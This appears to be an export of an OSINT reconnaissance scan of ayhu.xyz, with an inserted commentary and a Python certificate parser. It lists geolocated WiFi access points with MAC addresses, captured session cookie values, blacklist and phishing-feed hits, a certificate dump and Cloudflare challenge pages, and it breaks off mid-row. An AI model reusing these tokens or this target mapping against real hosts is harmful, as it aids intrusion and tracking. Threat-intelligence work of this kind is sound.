| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 2WIRE522 (Net ID: 00:01:E6:93:CB:2D) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | W4B3P<]00D^20&51%1C35&6H'%***%Ph (Net ID: 00:06:66:2A:52:5E) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:55:15 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Set_Cookie": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Set_Cookie": ["XSRF-TOKEN=eyJpdiI6IkpHMTdmeTU3ZDYwZnVJOEZ6K1lCMmc9PSIsInZhbHVlIjoiMXA0Z1VsZWxwK2dDVkY4Sk1IWVdXKzNzaU8zM1VPcytNUE9HZEtmVkpmY0tRQ3BMczIyMjR4ZU9VWFdDRTRVNG94cU5KbXFkdnA3L3dVdEo3cy9YYTgvOWdtdHpISktCOWlOa0UrWG1LZWtPL1lVWHFsOEhhRjFaZ3dYZDZiU2siLCJtYWMiOiJiYzUwNmFjZjdkMzVlMzczZWI5YTJmMzM4NWFhOGYwYTA0Y2VkNmJlZWI5YmZhODViNDMwMjNjYTY5NjI1NWIyIiwidGFnIjoiIn0%3D; expires=Thu, 11 May 2023 19:34:47 GMT; Max-Age=7200; path=/; samesite=lax", "laravel_session=eyJpdiI6ImdUVzFCME5hTHdVNjIvVHBRWjNUU2c9PSIsInZhbHVlIjoiaThZSTFKV29BNjc2ekZNZVRHdkNXTXJvVlVOZCtNemFRSlo4RFlXZ0lZR1pyV1FwMmp4K2ZmLzdmUEtBM0JTTjNTQmhnNG9uVlhabFJkUklRRkhVZmkrbVlnb1BZelR2K1VLNUkxdUhQL1d6bFBpSFk0QUJ4TzNDcjA5ZktLcjYiLCJtYWMiOiIxNzk1Nzg4OTNkYWJhNjk4NzRmM2E4Njc4ZDY3ZWE2M2Y2YzQxZTIxMTZjODQ2OTZiMDdmNWE1OGJjY2YyNzc0IiwidGFnIjoiIn0%3D; expires=Thu, 11 May 2023 19:34:47 GMT; Max-Age=7200; path=/; httponly; samesite=lax"], "Server": ["nginx/1.18.0 (Ubuntu)"], "Connection": ["keep-alive"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "Cache_Control": ["no-cache, private"]} | 165.232.113.85 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-l.github.io]
https://www.openphish.com/feed.txt | 0-l.github.io |
| 2023-05-12 03:03:17 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
|
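The certificate recorded above deserves a closer read than the scanner gives it: Let's Encrypt R3 issued it to ayhu.xyz, its SANs include the cpanel, cpcalendars, cpcontacts, webdisk and webmail names that a hosting panel's automatic certificate requests add, and its Not After of 14 March 2023 means it had expired about two months before this scan observed it on 12 May 2023. The parser below is an added example, not SpiderFoot code; it reads only the text layout shown on this page (it is not a DER or PEM parser), and the list of panel-service labels it flags is an assumption about that common pattern, not something the dump states.

```python
"""Parse the 'openssl x509 -text' style dump recorded above and answer the
questions an analyst has: who issued it, which names it covers, and whether
it was still valid when the scan saw it.

Added example, not SpiderFoot code.  Understands only the text layout on
this page (one 'Key: value' per line; SANs on the line after the
'X509v3 Subject Alternative Name:' header).
"""
import re
from datetime import datetime, timezone

# Constructed sample: the relevant lines of the certificate dump above.
CERT_TEXT = """Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
"""

# When the scan row above recorded this certificate.
SCAN_TIME = datetime(2023, 5, 12, 3, 3, 17, tzinfo=timezone.utc)

# Leftmost labels that cPanel's automatic certificate requests add
# (assumption based on the common pattern; the dump itself says nothing).
CPANEL_LABELS = {"cpanel", "cpcalendars", "cpcontacts", "webdisk", "webmail"}

_DATE_FMT = "%b %d %H:%M:%S %Y"


def _parse_openssl_date(s: str) -> datetime:
    """'Mar 14 03:53:53 2023 GMT' -> aware UTC datetime.  openssl pads
    single-digit days with a space, so whitespace is collapsed first."""
    s = " ".join(s.split())
    if not s.endswith(" GMT"):
        raise ValueError(f"unexpected date format: {s!r}")
    return datetime.strptime(s[:-4], _DATE_FMT).replace(tzinfo=timezone.utc)


def parse_cert_text(text: str) -> dict:
    """Extract issuer, subject, serial, validity window and SANs."""
    lines = [ln.strip() for ln in text.splitlines()]
    info = {"sans": [], "serial": None}
    for i, ln in enumerate(lines):
        if ln.startswith("Issuer:"):
            info["issuer"] = ln.split(":", 1)[1].strip()
        elif ln.startswith("Subject:"):
            info["subject"] = ln.split(":", 1)[1].strip()
        elif ln.startswith("Not Before:"):
            info["not_before"] = _parse_openssl_date(ln.split(":", 1)[1])
        elif ln.startswith("Not After"):
            info["not_after"] = _parse_openssl_date(ln.split(":", 1)[1])
        elif ln == "Serial Number:" and i + 1 < len(lines):
            info["serial"] = lines[i + 1].replace(":", "")
        elif ln.startswith("X509v3 Subject Alternative Name") and i + 1 < len(lines):
            info["sans"] = re.findall(r"DNS:([^,\s]+)", lines[i + 1])
    return info


def valid_at(info: dict, when: datetime) -> bool:
    """True if `when` lies inside the certificate's validity window."""
    return info["not_before"] <= when <= info["not_after"]


def covers(info: dict, hostname: str) -> bool:
    """True if hostname matches a SAN exactly or via one wildcard label."""
    host = hostname.lower().rstrip(".")
    for san in info["sans"]:
        san = san.lower()
        if san == host:
            return True
        if san.startswith("*.") and host.count(".") == san.count(".") and host.endswith(san[1:]):
            return True
    return False


def panel_hostnames(info: dict) -> list:
    """SANs whose leftmost label is a hosting-panel service name."""
    return [s for s in info["sans"] if s.split(".")[0].lower() in CPANEL_LABELS]


if __name__ == "__main__":
    cert = parse_cert_text(CERT_TEXT)
    print("issuer        :", cert["issuer"])
    print("valid at scan :", valid_at(cert, SCAN_TIME))
    print("panel names   :", panel_hostnames(cert))
```

Run against the dump above, `valid_at` returns False for the scan time, so either the host had renewed by May 2023 and the passive source returned a stale certificate, or it was still serving an expired one; either way the row should not be read as "ayhu.xyz has a valid certificate". `covers` also shows that nwapi.battleb0t.xyz, seen elsewhere in this scan, is not a name this certificate vouches for.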
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.178): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:23 | Web Content | No | Web Spider | 3 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6071cb5443bc')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="IeJGNK1NlgODfmY5lM_CSOUsGpZRJayFri_EMqB7p9E-1683860063-0-AX4CepkLIrJBlYjsLY8SxaK3uwNGfYi_cI78cSgODaKEdDdhGruTJdLNKHipCAas1yRDoJa4jk3w7x3p7ckhzOJuKfeCo8jNUnP70adNIU5dZKa8JiOWBoI9SYK5Q_oq1Eks42yH_Pz5BuZ0QF6ODH2_k4pUMdjxKhGMZCyDKNM52sbeTu0IU1Z9_e1tCtOuH9J1aFZ2tonlXDc4g9zbIux7ExZ49kbKhnzKgiWBhIHUBpMYeWpuSJ_4qCfMlTT-uy5MHKpoVHLVBmCsQ5mELCsRXClDzOjpDkTqbSfAbh8hd0u6E9AsLVFq6mkA8uYgAs4nEqsUUv46GTcwvbzUbkKc1QJ8A2k0LYiOtqEyNozJ7I--u1pFreN-cf0BqBu1bjzjmjk9Ufw9C0rNxE7G3P6fqZnucT3KAI7GF68B4SHiO-kTUnp1udVECKZapa-19gQJJJtF13C6VjJjrQRVkch5xapdVTcSAJFESEO-EAMR9hDp7y8V-5vaHn6SIRKHs78Flbh2RF_P6lv_MAE36XjAyTTiidlaFqpS1ZnkznV7tCrGaYKNvXxibZ3SNtIzHvSSCizS-Sm2WncoqNtWFQZw4MSwC5gehOZvyL9OAj1SA9fWTQ-bfiW7LrZlzCWCJLIZUGG9pJVYCgum_TAJJVGfiljuO91NZvVvNyIgtAepbw2YAdNPwZ3YrRDL_1Un5U1kxz28HuDFJsvpLlTZSNRhPXl4BIx30MOZx9T7SUFWsCGh9uDL2bDPiBh0LSwqszBX0SLNJRo1MhT7IXGB7zy1gfVfFqqb3W0mfVcaymGtm5dqhUdBPRlb4wd_5_BMrKEUeZE1d8HDjjoyYLhvv36SD_5wRCbXxsfCdK2do3aGeM7O6LtZhGR0RuwOPFtRToqLDpM6HnWkxfbvRwTWbQt3gNfo6RJeaXs42GfGC6vMhv6-Zpdazh2C2qr1j5WGxsjVqAAnZQgtB_uAAZyLoW1Egawj2Dc9S-5JYlq2p44Cqz8kfn_HZzhJUPbd4OlAseBQZQfvTsxwQ8yBZFjNQTY6QE_0SDhUH44IwsfVzyg_qg2EOGimekLuWDzCGVBFHthTUHY_Uucg55yA_sEwBbcPwi19lZdxlJ7Akcrfm9Q1xTPYWqd3yg8TDkXwERtBie2ALa_sZMgXe5lFShstzVHZMFcNmZZ_Glu5XNCQGzZM4IALYOXDtzDzNfENL_KkCst225-oNpK1Rzcel6A6qrg383feNMfsfhR4f-t-0gjSgQcGjcMVuJSy33wzj3MyKMSAUAn1H3AU4KXx5l9gYHyPt3K2hXsw8kpaOC5iz5-tYdad463GleEPqMnQXyYze0-F-Kwpfaw0OW4xcwFgpJ7lUIa_Uo9RY1JgFEsKioyqNmIqHv90TnhF2xXyZtqCIT2zmPgDYc3GYmtDVDX3JH3IZ4Ue_9zw8eTUmmNzSLvHF-5-Jv1PvIxzwhsHdZ-9Y8a5xpT_YJ3ApVgxhBxQ9P11Ef3die91V-gWJ9blK7JyrAR97qvn0MVCh6Ipd0gUwoYP19FqAzVItOvoLt6KwAJ_P9BHXzn9V-Qn-K8E2u451f3eK9LuNMBNNeHTIZgwhKeDRKi_7YqSZEtSZBhservvl6AG5D792DbSptVg8teok3yfFJdmbmsVVtq_xMiFDR-JbWee4Xq5OGPEw-qzY3kVcZ3JGSH21pWSbawncJ1pZkYh_Y8uqWXqK_LHYCf1eZ4giUZOc1qNXVqD_66D8diNIgnlP3oGUHrBgTMOfZxq_Uhi6OAhZ7SG3lBy8EfeOsdCdZ3k3gkwd2BrqWGkSsiJCJw71aRSSLzklcMwO0t4rEGUoCt0P2QnnyFhBnAPmmU7bxfnvOSfNl67KcA670pAvXnjK5gtdmpWFLEQTKLiAxus6
a1J55sB1jh2yyAgp9gU2TTlKH22JllQWbKYrEsbRrNjjaWTpuGgMUZEhABzykAV0_5Ryf5b1Iu8aB_yUQXLfxLOISB2J16hIkX9JBFDhB-K2iwT5AigiDsDn3kKx7Yn_RfRJoS2pRLWMZrIYAvnVYgYm9y81edopks9rnm7ZmUwgzO-G3g49daHSOyerkiJ0r3J8Okw4DK6PeI9iYnnJ3PuZHAUjE4lk_8MrIhAc4uYX4K1o-9Ke-xbpTbnl7jmdG3Gm-3L29y4tiQBKGjYgOtRk8-ysAEQVxg_UH3seGqQfmukY-uxgmHTqDedEdiiNc4iffnQwUfSPCDaUaRSMt4-JL4MYFn2fdPc4VcXOX79Z268m3iG4CyIoyIieiZJxKq5Fytf17H7DrAwzAK-7_cWORr2s0UVl6ksSgbwFTpGy4N__sJOF51dtXEfVEmWHx_Pzkw3X_pi-v5lATWE8lvwSB-TSiJYfQSJHSYYT6HXfaT1w6X76n4kq-ZrPPxvvJoJiND7W8ZhQjzgNr36p7jhZIQMiMAEzKgTQ4vmitfYqD4w00ar7uYe4W9UaptpqutZe32-rsetHK4f8sKgJ3CeKwcgiEQOluwAYjS5sFZ43pJ1k3hVEeYe7pLW">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '15631',
cRay: '7c5f6071cb5443bc',
cHash: '381065269fdd378',
cUPMDTk: "\/?__cf_chl_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '…',
t: 'MTY4Mzg2MDA2My4wMDEwMDA=',
m: 'ku7Iuu8p9xCCueKE3I6e30hCT4pHjE58URs2150Qfj8=',
i1: 'MsbaNnnSVdv9s0jxu/qFPg==',
i2: 'D5L567ziFL3S1185dlxV3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6071cb5443bc');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6071cb5443bc';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU |
| 2023-05-12 03:38:35 | Blacklisted Affiliate IP Address | Yes | UCEPROTECT | 0 | 0 | 4 | 0 | None | UCEPROTECT - Level 2 (some false positives) (46.101.229.63) | 46.101.229.63 |
| 2023-05-12 03:43:57 | URL (Form) | No | Page Information | 0 | 0 | 5 | 0 | None | https://ayhu.xyz/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5a3bb81a1b')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="e35Zj8G5BDk9XldXhqgKMMl4m4jJjyX9hPpRt8lgb3o-1683861861-0-AeRvD12zRrpKT1Vj_NZpuXTYPY0T_C-IsEnAR9u2dCvcdsLy9Sv3iw7wV_fgwkqNl3iHxdj5qFwNZJL3xkB-iwW9vjUdMNxMyhnqv8JlscfNtie9SAcppGbOk7uCBiZIQLa1SBVNw6UUv-_a_FXFD2296FJ4KrNIS6arC6VFPDD30uM_354WVFgyW4mKtrSpYK5InwieJ1Vkv6ZxoCDhBRMhNxgPpigNP0QmWXw8y1_k8lflCwo_Q9K8uZ_qtQFf0Gfd14ZLuORqP0m48rgXZsNXk2d82Mm2SMemmjVviG7PuPUL1CbnB3WfSK2OQGeY4U-Gy7kSdq7i3_ymV00fkl4RBJdkPDOtsR2eeN44cG0QzvhUzJu9a18Wx-JBgeMkCDDp2c6FvebNEOQydvCZrys93XZSGdta0GBiBfCz0DM6AFXJXoguOORHg7MOd62eoxeeua6hY1HFOifFbgHz4R4_F4geEyT8xPiS9kLqmv-8Tv9wFT23J38aRv3VS8KGL7JX_pO7KJv7qjQiIN2XDIN1kP01EuKi5fpoFbmvumK_aQpspEPJd-oYkv6g3z8upJ_i8gMQOJzdPMV462qdkEt72KoSPvIxKpy4bKNXJwJjWy3MhsDm6o8-oFAI7dOznlN5m1idwbZgvsnclXbdkqJhXPQYzxjKdzlT7hyQKmtmMash-U3aTKSIpDEKkTstu-cs5rTf__9DuNB2pVPrKXIFuY7EwlrjB6j_0UJKavfBfT6h3NsKR3qKMg-rGVo2RSQdsEOud7Hh5F0cMs0nCAAWGTq86XwfC81O29W1K2i6OalWYJiW61x1Nv_qs72KoX0_Mpn3amoMA5KS1vGI6mPUPMiOwHSI0cRgqEERjtVjkE3-TwMesGkKvz-Aw2gGE9OL21frfN9JEzkR172OTICxrUfc7caDwzr9D9_NePtArl9cLDKFHEvxIxzgioPuODDLvyAfvi0dPWiWhMq7WkvCuoWovUiUA253wYEf7M9x4gD8lnc3kaUCBX9tFmIajIXhsaHhaKh_ysHvt7SDv4HQuHFmdW_PTHj46eP5odywpuZGDTSuWK7SWH7u71n7C_Ae4KUmVvgKAwroZ_dlv8I2ROpq-QoxjIwoWtmm2DsGljOITbn0msRXnKPyZMK8B7bxqx0Tk0lwfAxw5qFIfx9cKTkyEKNgMaJHKVRsdCxtQMpTYYbYCTs7ecYaFA-cfa8pDUJO-vS3eg6mjgEiRw-8bm1dPWtPUv2T1GYeSsTkWX7p26b8BfAn4XpyF65-516ZnQxFqk_LYA1aiczQzQWdLb1NuFpyAlTJVRij048j5uSY5WFvTrmsh7xjoZ2Z46DkwHtY4crfRZm3SD6Mg_03vOiI68rC6vzz6BqdsamaXqvoFcnUbGnDDjkCNPCk0I7LyG6AFbm_EwgFVB9gZOJPVWeWKxdCcEWIQQOyO_AqVnN-wyzH0S5fWbIjXusPp_qMzz38MsJyGlFbc7GOuh6S4SdpuQewqWPsqFDGHPGtQUEKXIDpP7weMLUYzqItqb4vPv3n4sxn1GsE-qNs3lpwxVrc1SL_ssnb3-_jfGgVSpkOmJliBGGmoH-AatJn35K3t_jno9HyCYJLmz1rZkbI33XoOACdRBNvladuDXSHE4m8J_n-NLMdDcqru4xU65kcr9OibRXR4hHHwc3rYYFV9kMj9KFuctQB10AWFL0_n3yW8Zlh4cik5rYLuGKboFr2i4pY9ykLSq7sms7Qe3oXXbRcmeWxKtL0NlB6gk_PWz-AAqtF3sr5sdva-7sRfyfrgrQxpiH5_wMb5DPqczx1O37xCMTLyF6YhMXn4ABmLQ-mt-EMWYX-tkGM85skgM2leXXJlv6HTAp-riDNoZ3OMVT4KeKIc6AIi8pOLxrJ9jD5o
VgtqxZff2ZqlinhLXHPSVtkPU-H6FAHinPrzSf3uH_Q3H0UuvzybBwb61Kz9xfOtHBkP2nWMCU86xpSbO4c6VIi3roOnQLOncMey4LehldRzG60kvAcLOIIzsotkC6A0TzBdXW6h8WnOc98kvqVlyyluYDZoGL2sgBQP5iT8LeZ1GiKa6nuzXWAIZArCXDfvtsaNftRUiJODl-iLsalLmXB287qXlXnC-Sqn-VkYBIG1c0SYjAXzvc-MH1JJfTmtb7X2x-mXdkkqwoy16YRiEGxdDA84vt_3-1PJIVkwQFdJL01areTvrgmeIqm94L-DFciyanQyUBPitgHcxMUsm51YpB6KDWM18BLL4ehHRO7XO7TX_IIKdZiHbwQcPJ8FX04IKxS2S5Y3q_h8S65tynRA7TtY9YDIyDgHWfsgLSoL1L6GRBWm_cX_GqkdNtINyYbvrEjvcbcBhRdYEvzv7ySe_t5eEL9DPxXMRgGUTSk5GXudJNBbnpRMcYsT7qBIns8TOaWZIAFXnDbumx2Yzf2QUY6Xnq_tYLe1hwa_1BstafWXYwwQNC50mTlgJK1S5YWtg1SKoybbC9x5fcZ1N-_oCRgLtaxFqIZMUnOoV0u2hpdcXGPpNrOH3SR">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '70037',
cRay: '7c5f8c5a3bb81a1b',
cHash: '1cbb584e4678a4a',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '…',
t: 'MTY4Mzg2MTg2MS40NzgwMDA=',
m: 'l9x6fYD43AkOSli+eEX3TiMPXRiBndCq0G/Dpt1PKp4=',
i1: 'nuJed/J938+IZsnq9K0k2g==',
i2: 'LCpeQRd016F0btwfkm2M8w==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
